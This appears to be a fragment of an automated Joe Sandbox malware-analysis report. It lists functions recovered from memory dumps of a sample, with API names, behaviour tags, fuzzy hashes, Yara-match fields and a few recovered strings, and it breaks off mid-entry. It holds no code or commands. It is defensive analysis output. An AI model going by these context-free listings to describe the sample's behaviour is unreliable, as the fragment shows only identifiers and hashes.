                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                          • String ID:
                          • API String ID: 1080698880-0
                          • Opcode ID: 57a05af81f985b0e377ceb1598bee9b74d02fc96113ccd60c581adf0dcb7ad62
                          • Instruction ID: 690c7a5f71eccc69ed72f77799a87f2c5c3001875e5f40de401591cdfccb6e99
                          • Opcode Fuzzy Hash: 57a05af81f985b0e377ceb1598bee9b74d02fc96113ccd60c581adf0dcb7ad62
                          • Instruction Fuzzy Hash: 37818D326407D28AFB249F26D440BDD76B7FB48BA4F545239EA5957BD4EB38CE028700
                          Function 000001CFB9607D90 Relevance: 15.1, APIs: 10, Instructions: 126COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: String$CloseHandleProcess$FreeOpen$CurrentToken
                          • String ID:
                          • API String ID: 3697972778-0
                          • Opcode ID: 403ccc861227b449e0fde81aaec5a2f355ca415b91da956a830027824c60e844
                          • Instruction ID: 9f0049fa0e77eafbcd459bf31a43436a274fcb53202c60fa74f70851ff3eac45
                          • Opcode Fuzzy Hash: 403ccc861227b449e0fde81aaec5a2f355ca415b91da956a830027824c60e844
                          • Instruction Fuzzy Hash: 005187352416C282FE68AB11E890BE97373FB84B94F48813DDE99477A5DF38CE468740
                          Function 000001CFB961C30C Relevance: 15.1, APIs: 10, Instructions: 123COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 2295021086-0
                          • Opcode ID: 4da4875620b1f92b924daa6a931a778707caf5e849f7b64176c98afd523aee9e
                          • Instruction ID: 3e58d3fe072175ec79e598c7b80dfa0167c993d28fe3f72c841e794ea97e8ace
                          • Opcode Fuzzy Hash: 4da4875620b1f92b924daa6a931a778707caf5e849f7b64176c98afd523aee9e
                          • Instruction Fuzzy Hash: AB51D7726407E38AFB65DB26C441BEC26B3A740BA8F146239DA5547AD5EB3CCE438704
                          Function 000001CFB961A5BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                          • String ID: @
                          • API String ID: 3473179607-2766056989
                          • Opcode ID: 5e9121238b5210a1ea3159215a31185dcb12772a96a5da2caa2b43af4d344009
                          • Instruction ID: 5db7c232ec6712013b9bc2561b58d378b5d2cfb045c4339d451d39eedf520667
                          • Opcode Fuzzy Hash: 5e9121238b5210a1ea3159215a31185dcb12772a96a5da2caa2b43af4d344009
                          • Instruction Fuzzy Hash: 8D815976244BD286FB548F24D584BA937B3EB44B74F55A33DCA7A822D1DB38CA56C300
                          Function 000001CFB96144F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                          • String ID: ceil
                          • API String ID: 3411037476-3069211559
                          • Opcode ID: b5dd8a30d6b54562a72f65b778ed9eb5167f322a29820b7d336c5849ae73d17a
                          • Instruction ID: e53cd8864248b7de0575a7a1830227bc5af6d1b6e6cf24c141e72ca9f4774a9f
                          • Opcode Fuzzy Hash: b5dd8a30d6b54562a72f65b778ed9eb5167f322a29820b7d336c5849ae73d17a
                          • Instruction Fuzzy Hash: 5341B131296AD281F6509B26F940BD972B7F798B88F50103DEA4D437A4EF38CE578300
                          Function 000001CFB9606210 Relevance: 13.6, APIs: 9, Instructions: 101timenetworkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEvent
                          • String ID:
                          • API String ID: 3019579578-0
                          • Opcode ID: 79e511864709ffbbde73a33bf69e271293399a6222738070655b22a36dfb0dad
                          • Instruction ID: e547e808bb784e5b2e02f268e01fd9ac8887f860660ddf6837885974b6f43d63
                          • Opcode Fuzzy Hash: 79e511864709ffbbde73a33bf69e271293399a6222738070655b22a36dfb0dad
                          • Instruction Fuzzy Hash: 0B4153321446C18BF7749B15E4907AEB3B3F3A4754F14523ADB8A43AA4DB78EE86C740
                          Function 000001CFB96060F0 Relevance: 13.6, APIs: 9, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterErrorLastLeave
                          • String ID:
                          • API String ID: 4082018349-0
                          • Opcode ID: d3e572e5e79f9f815d661d2295d7187d85695194ec046127c100848211dd9382
                          • Instruction ID: b3884703946b02938f06e6ed99855a06ac4644bd7469291f100a2d5eeda29e40
                          • Opcode Fuzzy Hash: d3e572e5e79f9f815d661d2295d7187d85695194ec046127c100848211dd9382
                          • Instruction Fuzzy Hash: F0314D326506C28AF7509F28D4C4B9D37B3FB64B48F54117ADA06866A5DF39CE8BC740
                          Function 000001CFB960E510 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75filestringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleWritelstrlenwsprintf
                          • String ID: %s %s
                          • API String ID: 2369136734-2939940506
                          • Opcode ID: 586a3a816ee8a111b5affe1204b7927bea72fa21104d559b43d04ba7da1764eb
                          • Instruction ID: bfad37dcd546c0eb361adffec60d28849b99b8774bedb6131cae3289bd33e848
                          • Opcode Fuzzy Hash: 586a3a816ee8a111b5affe1204b7927bea72fa21104d559b43d04ba7da1764eb
                          • Instruction Fuzzy Hash: 0E31CE312589D681FB709F21F494BDBB773F7D4794F44412A9A8942AA8DF38CE0ACB00
                          Function 000001CFB95CBDDD Relevance: 12.2, APIs: 8, Instructions: 165COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2819658684-0
                          • Opcode ID: aaccad324fe5c70c5f9df746226d9364551112f4e2a8b53086705aa8a37d231d
                          • Instruction ID: 06cad3256470c076386c431705828d7e7d6ea3d1072e5d9e2856bf1977deccb5
                          • Opcode Fuzzy Hash: aaccad324fe5c70c5f9df746226d9364551112f4e2a8b53086705aa8a37d231d
                          • Instruction Fuzzy Hash: 4551D2325D0A998BFBE59B28C584BE936F2FB44711F14427DE585C66D2CB30CE86C781
                          Function 000001CFB939F95C Relevance: 12.2, APIs: 8, Instructions: 165COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2819658684-0
                          • Opcode ID: c6f261f24af21140089df4e3039563bf3863edad6c6e4257521d5947174435c6
                          • Instruction ID: 0f404d5bcfc087cd2af7ec6c69fc41e0653fd15987c64b3ce2539dc457897e4b
                          • Opcode Fuzzy Hash: c6f261f24af21140089df4e3039563bf3863edad6c6e4257521d5947174435c6
                          • Instruction Fuzzy Hash: C3518E30550A9A9AFB659F98C484BE977F6FF44321F3C427D941BC61D2CB35CE428A42
                          Function 000001CFB9604AA0 Relevance: 12.1, APIs: 8, Instructions: 120memorynetworkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                          • String ID:
                          • API String ID: 1701177279-0
                          • Opcode ID: c42e260d004b3bc25826a470d31d1e4496d73dbccdd2e5f324cb076cb23d5860
                          • Instruction ID: ee8ace7b64920340e34e98270f4b7eac20fc641c67da75258e46e002c3123a67
                          • Opcode Fuzzy Hash: c42e260d004b3bc25826a470d31d1e4496d73dbccdd2e5f324cb076cb23d5860
                          • Instruction Fuzzy Hash: 8D513932240AC28AF7749F26E484BDD37B6F744B98F404029DA4A47B94EF78DA96C740
                          Function 000001CFB9603F40 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$setsockopt$CreateCurrentEventResetThreadTimerWaitablefreemalloc
                          • String ID:
                          • API String ID: 3356772049-0
                          • Opcode ID: c2b72c0c646ab73e3ff6ad403e122b312f2e4904b90c25866ab9b8e9ab376b02
                          • Instruction ID: 43b5a1c0c6803778cb5ec72da0a92c0f2940db8f6dfb4dea4fd20668f76725ee
                          • Opcode Fuzzy Hash: c2b72c0c646ab73e3ff6ad403e122b312f2e4904b90c25866ab9b8e9ab376b02
                          • Instruction Fuzzy Hash: DC516A72200B829BF7549F25E58479D77B2F748788F10403AEB4987B90DF79DA668B40
                          Function 000001CFB9605430 Relevance: 12.1, APIs: 8, Instructions: 82networksleeptimeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$CloseCurrentSleepThreadTimeclosesocketsendshutdowntime
                          • String ID:
                          • API String ID: 929257074-0
                          • Opcode ID: 24b510512f13a46b6ad09972d22530b9cbeb376f452b7ede55be531369f4c3e4
                          • Instruction ID: 97a7ef79d0782c56234f947ee20215b280ae35822f217171a7ac464b1b892554
                          • Opcode Fuzzy Hash: 24b510512f13a46b6ad09972d22530b9cbeb376f452b7ede55be531369f4c3e4
                          • Instruction Fuzzy Hash: F8311A3265069286FB619F26E4D4B9C33B3F784F65F14023ADA69466D8CF38CD46C740
                          Function 000001CFB9604F70 Relevance: 12.1, APIs: 8, Instructions: 64windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Peek$CloseDispatchErrorEventHandleLastMultipleObjectsTranslateWait
                          • String ID:
                          • API String ID: 1713936993-0
                          • Opcode ID: 90a3110bf25015334eda103b4dedeb1e46d3b967c95bf731c5aa3acee31876e2
                          • Instruction ID: bc94b0e70aa930b097f886973eabf088943eee2cd1ede2d52310e4abc483038d
                          • Opcode Fuzzy Hash: 90a3110bf25015334eda103b4dedeb1e46d3b967c95bf731c5aa3acee31876e2
                          • Instruction Fuzzy Hash: 58217F326505C282F7609F35E494F9E32B3FBA5B48F54423DDA5A825A4DF38CE5ACB01
                          Function 000001CFB9604E30 Relevance: 12.1, APIs: 8, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$HeapReset$CreateCriticalDestroyEnterFreeSection
                          • String ID:
                          • API String ID: 1658878062-0
                          • Opcode ID: b15515cd42b3c7a59d11d40a96123be03e24d317c2afb497afd93c342ce18e7a
                          • Instruction ID: f8b241b9cd6935d1207d0273672034702bc668b4f763ae6fb941968f79ddbd72
                          • Opcode Fuzzy Hash: b15515cd42b3c7a59d11d40a96123be03e24d317c2afb497afd93c342ce18e7a
                          • Instruction Fuzzy Hash: 78310636240BC2E2F698DB21E6847DCB776F754B80F50412ADB6A43651DF70EAB6C340
                          Function 000001CFB961B040 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                          • String ID:
                          • API String ID: 113790786-0
                          • Opcode ID: 4fc1ef6820775603606cc9dc222b7fdce9a924a0b9393d1a9cfc6eff100aeab1
                          • Instruction ID: 50bf1cf4b819c40919b1a9062a3826e2ec3a2d382361ad5e879d51f91b0c0858
                          • Opcode Fuzzy Hash: 4fc1ef6820775603606cc9dc222b7fdce9a924a0b9393d1a9cfc6eff100aeab1
                          • Instruction Fuzzy Hash: CD21D1316846E382F614AB32E805FEE23B7E780B84F05603CEA46476D6CF38CE428350
                          Function 000001CFB9602360 Relevance: 10.8, APIs: 2, Strings: 5, Instructions: 339COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$AllocHeap_callnewhfreemalloc
                          • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                          • API String ID: 3198430600-868042568
                          • Opcode ID: b9c24d6dd6d448623d8194ce3ec9ac1b7630b16744956a884b9e9d050a879636
                          • Instruction ID: 8dd71b149989431801593a53281c0903e6b04ee5ea2531b89fd2ee64132df9bd
                          • Opcode Fuzzy Hash: b9c24d6dd6d448623d8194ce3ec9ac1b7630b16744956a884b9e9d050a879636
                          • Instruction Fuzzy Hash: EDE1A0726446D28BF7768B29E4D0B9A7BB3FB84784F144029DB9643B85D738DE46CB00
                          Function 000001CFB9604400 Relevance: 10.7, APIs: 7, Instructions: 154threadnetworktimeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                          • String ID:
                          • API String ID: 3058130114-0
                          • Opcode ID: e284b261f3e280a2c9a426dcad1901252badce78381e2805f3eccfd93789d7af
                          • Instruction ID: f4ec884d58e22df76d0af162c33abf7e59498c4bc948314c5003774c011ca560
                          • Opcode Fuzzy Hash: e284b261f3e280a2c9a426dcad1901252badce78381e2805f3eccfd93789d7af
                          • Instruction Fuzzy Hash: CA615B31280AC286FB649F25D8D4BD923B7F744B98F544239EE5A867D5EF34CE428310
                          Function 000001CFB960CD5E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119registryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$CreateDeleteHandle_callnewhmallocstd::exception::exception
                          • String ID: Console\1
                          • API String ID: 2917754286-1035756066
                          • Opcode ID: 365750352fc34f55ffdf8fce61dcb1794e0e3b63090383709f973ce8d9472500
                          • Instruction ID: 01f440c5927aff43275948b01d6ee801a2288fdca4fff3429b5dedcf245b3d48
                          • Opcode Fuzzy Hash: 365750352fc34f55ffdf8fce61dcb1794e0e3b63090383709f973ce8d9472500
                          • Instruction Fuzzy Hash: DC517832300B9282FB58DB11E594BEE7376F789BC4F41412AAA4E47795CF38CA52C700
                          Function 000001CFB961E124 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 2574049805-3916222277
                          • Opcode ID: b4bc058c78e50e6e57c4f554ad32398b5525bb103744436a3dc36264a1bdab3a
                          • Instruction ID: 17e60d75e8dfbe2a185c723c99763aad1d1d53a16e5c7449de32f05b7755ae50
                          • Opcode Fuzzy Hash: b4bc058c78e50e6e57c4f554ad32398b5525bb103744436a3dc36264a1bdab3a
                          • Instruction Fuzzy Hash: 3941E1726407A245FB299F39D452BAC3AB3E784B94F146238DA14073D5EB38CE53C740
                          Function 000001CFB9613BBC Relevance: 10.6, APIs: 7, Instructions: 93threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$FreeHeap$ByteCharCriticalDeleteEnvironmentMultiSectionStringsWide$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValueVersion__setargv_cinit_errno
                          • String ID:
                          • API String ID: 125979975-0
                          • Opcode ID: 5c7a198a6bf3e74a284814fe9030744537be58b3e98e31e514715c20926680aa
                          • Instruction ID: d0b45efa1d559b73d2593d346e09de21b320ef253adc859d84d6c9abb4bf27a9
                          • Opcode Fuzzy Hash: 5c7a198a6bf3e74a284814fe9030744537be58b3e98e31e514715c20926680aa
                          • Instruction Fuzzy Hash: 263119306C42E386FA647776E906FE961B7AB60754F15613DA813C11D3EF28CF835212
                          Function 000001CFB95CB121 Relevance: 10.6, APIs: 7, Instructions: 93COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: adb07d1321ee7856dbb04410b93dc9777c949db3f49432debc9022dfd59ee3b0
                          • Instruction ID: 21a51206262e3b83940bd3854ecd8f97297cab4d83c1b84ae5e6dcb1a1d0daf1
                          • Opcode Fuzzy Hash: adb07d1321ee7856dbb04410b93dc9777c949db3f49432debc9022dfd59ee3b0
                          • Instruction Fuzzy Hash: 47213B321D8B844EF2196B68D9C2BF932F2EB45321F00026DF446C75D3D7A89D4382A2
                          Function 000001CFB939E0DC Relevance: 10.6, APIs: 7, Instructions: 93COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: e6985e12e6397c150a5502346323367360a42ad96b1106eccce0c26d1ba362ba
                          • Instruction ID: b464c3c5f5296ce87c9c9bc0de29803d097fce147d53b4830849c1b87ce4ff12
                          • Opcode Fuzzy Hash: e6985e12e6397c150a5502346323367360a42ad96b1106eccce0c26d1ba362ba
                          • Instruction Fuzzy Hash: F6213B30258A840EF3286F58D896BFD37EAEF46324F2D026DE547872D3D764AD434292
                          Function 000001CFB95CB965 Relevance: 10.6, APIs: 7, Instructions: 89COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 97455be3f636bc858ff527ab103684d291f06a334aad1a202db7ad900f8e3f22
                          • Instruction ID: 526c8ed1c87ba55762ddcd40bb4b45fd5efe456e0a19ed34c084da828c80cda1
                          • Opcode Fuzzy Hash: 97455be3f636bc858ff527ab103684d291f06a334aad1a202db7ad900f8e3f22
                          • Instruction Fuzzy Hash: 7221F7726C86844EF3186F68EDC2BF832F6EB45321F05026DF486875D3D7A49D4382A2
                          Function 000001CFB939E920 Relevance: 10.6, APIs: 7, Instructions: 89COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: f466c2900776dec78709f31630f8c073b92f50b4fa8424f811fbf9e3ff3e681c
                          • Instruction ID: 8115f9cbdc06c205e6c475f85f7f0fb22885f0025e67db9c4a648815782496be
                          • Opcode Fuzzy Hash: f466c2900776dec78709f31630f8c073b92f50b4fa8424f811fbf9e3ff3e681c
                          • Instruction Fuzzy Hash: 542107305486844EF3656F5CD896BFC37AAEF4A320F2D026DE507871E3D7689D434292
                          Function 000001CFB95C4AF5 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
